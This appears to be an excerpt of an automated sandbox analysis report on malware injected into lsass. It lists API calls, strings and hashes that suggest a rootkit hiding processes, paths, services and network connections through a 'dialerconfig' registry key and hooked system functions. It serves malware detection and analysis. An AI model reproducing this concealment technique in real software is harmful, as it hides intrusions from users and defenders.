Function 000002D6F1511628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002D6F1511633
HeapAlloc.KERNEL32 ref: 000002D6F1511642

Part of subcall function 000002D6F1511268: GetProcessHeap.KERNEL32 ref: 000002D6F151126E
Part of subcall function 000002D6F1511268: HeapAlloc.KERNEL32 ref: 000002D6F151127D
Part of subcall function 000002D6F1511268: GetProcessHeap.KERNEL32 ref: 000002D6F1511297
Part of subcall function 000002D6F1511268: HeapAlloc.KERNEL32 ref: 000002D6F15112A8

RegOpenKeyExW.ADVAPI32 ref: 000002D6F15116B2
RegOpenKeyExW.ADVAPI32 ref: 000002D6F15116DF
RegCloseKey.ADVAPI32 ref: 000002D6F15116F9
RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511719
RegCloseKey.ADVAPI32 ref: 000002D6F1511734
RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511754
RegCloseKey.ADVAPI32 ref: 000002D6F151176F
RegOpenKeyExW.ADVAPI32 ref: 000002D6F151178F
RegCloseKey.ADVAPI32 ref: 000002D6F15117AA
RegOpenKeyExW.ADVAPI32 ref: 000002D6F15117CA
RegCloseKey.ADVAPI32 ref: 000002D6F15117E5
RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511805
RegCloseKey.ADVAPI32 ref: 000002D6F1511820
RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511840
RegCloseKey.ADVAPI32 ref: 000002D6F151185B
RegOpenKeyExW.ADVAPI32 ref: 000002D6F151187B
RegCloseKey.ADVAPI32 ref: 000002D6F1511896
RegCloseKey.ADVAPI32 ref: 000002D6F15118A0

Part of subcall function 000002D6F15112BC: RegQueryInfoKeyW.ADVAPI32 ref: 000002D6F1511319
Part of subcall function 000002D6F15112BC: GetProcessHeap.KERNEL32 ref: 000002D6F1511327
Part of subcall function 000002D6F15112BC: HeapAlloc.KERNEL32 ref: 000002D6F1511338
Part of subcall function 000002D6F15112BC: RegEnumValueW.ADVAPI32 ref: 000002D6F1511397
Part of subcall function 000002D6F15112BC: GetProcessHeap.KERNEL32 ref: 000002D6F15113DF
Part of subcall function 000002D6F15112BC: HeapAlloc.KERNEL32 ref: 000002D6F15113ED
Part of subcall function 000002D6F15112BC: GetProcessHeap.KERNEL32 ref: 000002D6F151140A
Part of subcall function 000002D6F15112BC: HeapFree.KERNEL32 ref: 000002D6F1511418
Part of subcall function 000002D6F15112BC: lstrlenW.KERNEL32 ref: 000002D6F1511421
Part of subcall function 000002D6F15112BC: GetProcessHeap.KERNEL32 ref: 000002D6F151142F
Part of subcall function 000002D6F15112BC: HeapAlloc.KERNEL32 ref: 000002D6F151143D

Strings

SOFTWARE\dialerconfig, xrefs: 000002D6F1511692
startup, xrefs: 000002D6F15116D5
tcp_local, xrefs: 000002D6F15117FE
udp, xrefs: 000002D6F1511874
process_names, xrefs: 000002D6F151174D
paths, xrefs: 000002D6F1511788
service_names, xrefs: 000002D6F15117C3
pid, xrefs: 000002D6F1511712
tcp_remote, xrefs: 000002D6F1511839

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction ID: 1e1e47678fa7c4b781087d3b5f8b15c943a24ad0d42d65cabc9df2231e8d4def
Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction Fuzzy Hash: 1B71A5A6710E918AEB119F76F89CA9923B4FB84BC8F405112DE4E57F69EF2CC844C744

Function 000002D6F1571628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002D6F1571633
HeapAlloc.KERNEL32 ref: 000002D6F1571642

Part of subcall function 000002D6F1571268: GetProcessHeap.KERNEL32 ref: 000002D6F157126E
Part of subcall function 000002D6F1571268: HeapAlloc.KERNEL32 ref: 000002D6F157127D
Part of subcall function 000002D6F1571268: GetProcessHeap.KERNEL32 ref: 000002D6F1571297
Part of subcall function 000002D6F1571268: HeapAlloc.KERNEL32 ref: 000002D6F15712A8

RegOpenKeyExW.ADVAPI32 ref: 000002D6F15716B2
RegOpenKeyExW.ADVAPI32 ref: 000002D6F15716DF
RegCloseKey.ADVAPI32 ref: 000002D6F15716F9
RegOpenKeyExW.ADVAPI32 ref: 000002D6F1571719
RegCloseKey.ADVAPI32 ref: 000002D6F1571734
RegOpenKeyExW.ADVAPI32 ref: 000002D6F1571754
RegCloseKey.ADVAPI32 ref: 000002D6F157176F
RegOpenKeyExW.ADVAPI32 ref: 000002D6F157178F
RegCloseKey.ADVAPI32 ref: 000002D6F15717AA
RegOpenKeyExW.ADVAPI32 ref: 000002D6F15717CA
RegCloseKey.ADVAPI32 ref: 000002D6F15717E5
RegOpenKeyExW.ADVAPI32 ref: 000002D6F1571805
RegCloseKey.ADVAPI32 ref: 000002D6F1571820
RegOpenKeyExW.ADVAPI32 ref: 000002D6F1571840
RegCloseKey.ADVAPI32 ref: 000002D6F157185B
RegOpenKeyExW.ADVAPI32 ref: 000002D6F157187B
RegCloseKey.ADVAPI32 ref: 000002D6F1571896
RegCloseKey.ADVAPI32 ref: 000002D6F15718A0

Part of subcall function 000002D6F15712BC: RegQueryInfoKeyW.ADVAPI32 ref: 000002D6F1571319
Part of subcall function 000002D6F15712BC: GetProcessHeap.KERNEL32 ref: 000002D6F1571327
Part of subcall function 000002D6F15712BC: HeapAlloc.KERNEL32 ref: 000002D6F1571338
Part of subcall function 000002D6F15712BC: RegEnumValueW.ADVAPI32 ref: 000002D6F1571397
Part of subcall function 000002D6F15712BC: GetProcessHeap.KERNEL32 ref: 000002D6F15713DF
Part of subcall function 000002D6F15712BC: HeapAlloc.KERNEL32 ref: 000002D6F15713ED
Part of subcall function 000002D6F15712BC: GetProcessHeap.KERNEL32 ref: 000002D6F157140A
Part of subcall function 000002D6F15712BC: HeapFree.KERNEL32 ref: 000002D6F1571418
Part of subcall function 000002D6F15712BC: lstrlenW.KERNEL32 ref: 000002D6F1571421
Part of subcall function 000002D6F15712BC: GetProcessHeap.KERNEL32 ref: 000002D6F157142F
Part of subcall function 000002D6F15712BC: HeapAlloc.KERNEL32 ref: 000002D6F157143D

Strings

tcp_local, xrefs: 000002D6F15717FE
service_names, xrefs: 000002D6F15717C3
paths, xrefs: 000002D6F1571788
startup, xrefs: 000002D6F15716D5
pid, xrefs: 000002D6F1571712
SOFTWARE\dialerconfig, xrefs: 000002D6F1571692
tcp_remote, xrefs: 000002D6F1571839
process_names, xrefs: 000002D6F157174D
udp, xrefs: 000002D6F1571874

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction ID: 3325cba9d1b967ae01adee52ee0ae7b01beceab54b901428531b2005536fff07
Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction Fuzzy Hash: A971E5A6324E148AEB209F66F89D69963B4FB84BD8F005113DE4F47E69EE38C845C744

Function 000002D6F15112BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002D6F1511319
GetProcessHeap.KERNEL32 ref: 000002D6F1511327
HeapAlloc.KERNEL32 ref: 000002D6F1511338
RegEnumValueW.ADVAPI32 ref: 000002D6F1511397

Part of subcall function 000002D6F151152C: StrCmpIW.SHLWAPI ref: 000002D6F151155D

GetProcessHeap.KERNEL32 ref: 000002D6F15113DF
HeapAlloc.KERNEL32 ref: 000002D6F15113ED
GetProcessHeap.KERNEL32 ref: 000002D6F151140A
HeapFree.KERNEL32 ref: 000002D6F1511418
lstrlenW.KERNEL32 ref: 000002D6F1511421
GetProcessHeap.KERNEL32 ref: 000002D6F151142F
HeapAlloc.KERNEL32 ref: 000002D6F151143D
StrCpyW.SHLWAPI ref: 000002D6F151145F
GetProcessHeap.KERNEL32 ref: 000002D6F1511476
HeapFree.KERNEL32 ref: 000002D6F1511484

Strings

d, xrefs: 000002D6F151135A

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction ID: 5fb3b21df960b81225b638196f68b2da2c963b60e6c4826c36aa05b26c7c4fc2
Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction Fuzzy Hash: B95115B6200B848AEB55CF62F54C35AA7A1F789FD9F144126DE4A07B58DF3CD849CB00

Function 000002D6F15712BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002D6F1571319
GetProcessHeap.KERNEL32 ref: 000002D6F1571327
HeapAlloc.KERNEL32 ref: 000002D6F1571338
RegEnumValueW.ADVAPI32 ref: 000002D6F1571397

Part of subcall function 000002D6F157152C: StrCmpIW.SHLWAPI ref: 000002D6F157155D

GetProcessHeap.KERNEL32 ref: 000002D6F15713DF
HeapAlloc.KERNEL32 ref: 000002D6F15713ED
GetProcessHeap.KERNEL32 ref: 000002D6F157140A
HeapFree.KERNEL32 ref: 000002D6F1571418
lstrlenW.KERNEL32 ref: 000002D6F1571421
GetProcessHeap.KERNEL32 ref: 000002D6F157142F
HeapAlloc.KERNEL32 ref: 000002D6F157143D
StrCpyW.SHLWAPI ref: 000002D6F157145F
GetProcessHeap.KERNEL32 ref: 000002D6F1571476
HeapFree.KERNEL32 ref: 000002D6F1571484

Strings

d, xrefs: 000002D6F157135A

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction ID: 718f7aadee3d6f7050338ef8a03f988c86b4b4f2c6465c432f63d4a1cf27d5bc
Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
Instruction Fuzzy Hash: 865128B6214B848BEB54CF62F54D35A77A2F789FD9F048126DA4A07B59DF3CC8498B00

Function 000002D6F1511D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002D6F1511D1F

Part of subcall function 000002D6F1511FD4: GetModuleHandleA.KERNEL32 ref: 000002D6F1511FEC
Part of subcall function 000002D6F1511FD4: GetProcAddress.KERNEL32 ref: 000002D6F1511FFD

Part of subcall function 000002D6F1515B30: GetCurrentThreadId.KERNEL32 ref: 000002D6F1515B6B

Strings

EnumServicesStatusExW, xrefs: 000002D6F1511E11, 000002D6F1511E32
NtQueryDirectoryFileEx, xrefs: 000002D6F1511D9C
NtEnumerateValueKey, xrefs: 000002D6F1511DD6
ntdll.dll, xrefs: 000002D6F1511D2D
sechost.dll, xrefs: 000002D6F1511E39
NtQueryDirectoryFile, xrefs: 000002D6F1511D7F
EnumServiceGroupW, xrefs: 000002D6F1511DF0
NtResumeThread, xrefs: 000002D6F1511D62
NtDeviceIoControlFile, xrefs: 000002D6F1511E56
NtQuerySystemInformation, xrefs: 000002D6F1511D45
advapi32.dll, xrefs: 000002D6F1511DF7, 000002D6F1511E18
NtEnumerateKey, xrefs: 000002D6F1511DB9

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction ID: acd4e2c9eb3dd1a9bb1b7a25fe6521af63330346e6cf64fc31cecd724e9f3874
Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction Fuzzy Hash: C83162E9110E8AA8EE06EFA5F8AE6D46321B7143C4F905017981F23D75DF7C8E4AC760

Function 000002D6F1571D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002D6F1571D1F

Part of subcall function 000002D6F1571FD4: GetModuleHandleA.KERNEL32 ref: 000002D6F1571FEC
Part of subcall function 000002D6F1571FD4: GetProcAddress.KERNEL32 ref: 000002D6F1571FFD

Part of subcall function 000002D6F1575B30: GetCurrentThreadId.KERNEL32 ref: 000002D6F1575B6B

Strings

NtDeviceIoControlFile, xrefs: 000002D6F1571E56
NtResumeThread, xrefs: 000002D6F1571D62
NtQuerySystemInformation, xrefs: 000002D6F1571D45
NtQueryDirectoryFile, xrefs: 000002D6F1571D7F
EnumServicesStatusExW, xrefs: 000002D6F1571E11, 000002D6F1571E32
EnumServiceGroupW, xrefs: 000002D6F1571DF0
NtQueryDirectoryFileEx, xrefs: 000002D6F1571D9C
sechost.dll, xrefs: 000002D6F1571E39
NtEnumerateKey, xrefs: 000002D6F1571DB9
advapi32.dll, xrefs: 000002D6F1571DF7, 000002D6F1571E18
ntdll.dll, xrefs: 000002D6F1571D2D
NtEnumerateValueKey, xrefs: 000002D6F1571DD6

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction ID: 7647314fc5b6d40601e2c34ec03d1841272cc1e0078bda06571078b55a98c4b7
Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction Fuzzy Hash: 173192E4124E4AA9FA04EBA5F86EAE46360B7143D5FC08027D45F12D65DF7C8E4EC790

Function 000002D6F14E6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002D6F14E6938
__scrt_acquire_startup_lock.LIBCMT ref: 000002D6F14E698A
_RTC_Initialize.LIBCMT ref: 000002D6F14E69B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002D6F14E69DE
__scrt_release_startup_lock.LIBCMT ref: 000002D6F14E6A09

Strings

`eh vector copy constructor iterator', xrefs: 000002D6F14E6A3B
`dynamic initializer for ', xrefs: 000002D6F14E69C7
scriptor', xrefs: 000002D6F14E6B39, 000002D6F14E6BB2, 000002D6F14E6BEC
`eh vector vbase copy constructor iterator', xrefs: 000002D6F14E69EE

Memory Dump Source

Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
API String ID: 190073905-1786718095
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: a6791069ef224389268787c1cde3096a7f5d96d964d78a2d6507250396e19ec1
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: A681EF61A00E018EFA54EB66B44D3A966E1ABC57C0F54812B9A1B47F9FDF3CCE458B00

Function 000002D6F151CE28 Relevance: 18.1, APIs: 12, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 000002D6F151CE37
FlsGetValue.KERNEL32(?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CE4C
FlsSetValue.KERNEL32(?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CE6D
FlsSetValue.KERNEL32(?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CE9A
FlsSetValue.KERNEL32(?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CEAB
FlsSetValue.KERNEL32(?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CEBC
SetLastError.KERNEL32 ref: 000002D6F151CED7
FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CF0D
FlsSetValue.KERNEL32(?,?,00000001,000002D6F151ECCC,?,?,?,?,000002D6F151BF9F,?,?,?,?,?,000002D6F1517AB0), ref: 000002D6F151CF2C

Part of subcall function 000002D6F151D6CC: HeapAlloc.KERNEL32 ref: 000002D6F151D721

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CF54

Part of subcall function 000002D6F151D744: HeapFree.KERNEL32 ref: 000002D6F151D75A
Part of subcall function 000002D6F151D744: GetLastError.KERNEL32 ref: 000002D6F151D764

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CF65
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CF76

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction ID: cbe95e8add907aa0b2c73cf7f4231efe5140574644f478dc5db001f93a5baefd
Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction Fuzzy Hash: C4410EE0301E444EFE6BAF35755E36962429B447F0F240B27A93F6AED6DE2DDC418600

Function 000002D6F157CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000002D6F157CE37
FlsGetValue.KERNEL32(?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CE4C
FlsSetValue.KERNEL32(?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CE6D
FlsSetValue.KERNEL32(?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CE9A
FlsSetValue.KERNEL32(?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CEAB
FlsSetValue.KERNEL32(?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CEBC
SetLastError.KERNEL32 ref: 000002D6F157CED7
FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CF0D
FlsSetValue.KERNEL32(?,?,00000001,000002D6F157ECCC,?,?,?,?,000002D6F157BF9F,?,?,?,?,?,000002D6F1577AB0), ref: 000002D6F157CF2C

Part of subcall function 000002D6F157D6CC: HeapAlloc.KERNEL32 ref: 000002D6F157D721

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CF54

Part of subcall function 000002D6F157D744: HeapFree.KERNEL32 ref: 000002D6F157D75A
Part of subcall function 000002D6F157D744: GetLastError.KERNEL32 ref: 000002D6F157D764

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CF65
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CF76

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction ID: 21ae960c7e4dd132fac355595f541caa38080038c1a896d72f44f5f893906091
Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction Fuzzy Hash: 3B412BE0305E4D4EFF69A735755F76962825B447F0F548B27A83F4AEEADE2C9C018201

Function 000002D6F1512244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002D6F1512259
GetCurrentProcessId.KERNEL32 ref: 000002D6F1512263

Part of subcall function 000002D6F1511934: OpenProcess.KERNEL32 ref: 000002D6F1511952
Part of subcall function 000002D6F1511934: IsWow64Process.KERNEL32 ref: 000002D6F1511968
Part of subcall function 000002D6F1511934: CloseHandle.KERNEL32 ref: 000002D6F1511983

CreateFileW.KERNEL32 ref: 000002D6F15122BC
WriteFile.KERNEL32 ref: 000002D6F15122E4
ReadFile.KERNEL32 ref: 000002D6F1512303
CloseHandle.KERNEL32 ref: 000002D6F151230C

Strings

\\.\pipe\dialerchildproc32, xrefs: 000002D6F1512293
\\.\pipe\dialerchildproc64, xrefs: 000002D6F151228C

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction ID: 16cc91b0a522ba52fd30a106300581a7bfe1bf7e397ef6e488c8d9df07b3eb6a
Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction Fuzzy Hash: 44212CB6614B8086FB108B25F44C76A77A1F789BE5F504216EA5E03FA8DF7CC949CB00

Function 000002D6F1572244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002D6F1572259
GetCurrentProcessId.KERNEL32 ref: 000002D6F1572263

Part of subcall function 000002D6F1571934: OpenProcess.KERNEL32 ref: 000002D6F1571952
Part of subcall function 000002D6F1571934: IsWow64Process.KERNEL32 ref: 000002D6F1571968
Part of subcall function 000002D6F1571934: CloseHandle.KERNEL32 ref: 000002D6F1571983

CreateFileW.KERNEL32 ref: 000002D6F15722BC
WriteFile.KERNEL32 ref: 000002D6F15722E4
ReadFile.KERNEL32 ref: 000002D6F1572303
CloseHandle.KERNEL32 ref: 000002D6F157230C

Strings

\\.\pipe\dialerchildproc64, xrefs: 000002D6F157228C
\\.\pipe\dialerchildproc32, xrefs: 000002D6F1572293

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction ID: 3bee671e8776f551583a9937c8cd74961dd71f46eddd50b45fa1b45f6358f85f
Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction Fuzzy Hash: 2D210CB6628A44C7EB108B25F44C75967A1F789BE4F504216EA5E06EA8DF7CC949CB00

Function 000002D6F151A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000002D6F151A5A1

Part of subcall function 000002D6F151B414: __GetUnwindTryBlock.LIBCMT ref: 000002D6F151B457
Part of subcall function 000002D6F151B414: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000002D6F151B47C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000002D6F151A679
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000002D6F151A8CE
std::bad_alloc::bad_alloc.LIBCMT ref: 000002D6F151A9DA

Strings

csm, xrefs: 000002D6F151A69C
csm, xrefs: 000002D6F151A5BB
csm, xrefs: 000002D6F151A622

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction ID: c723f1f196541d97861d438692a693aba2ea927f234d4d4577a4b0ac93f6314a
Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction Fuzzy Hash: C6E15DB6604B808AEB629FA5E44C39D77A0F745BD8F100517EE8E67F99CB38D991C700

Function 000002D6F157A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000002D6F157A5A1

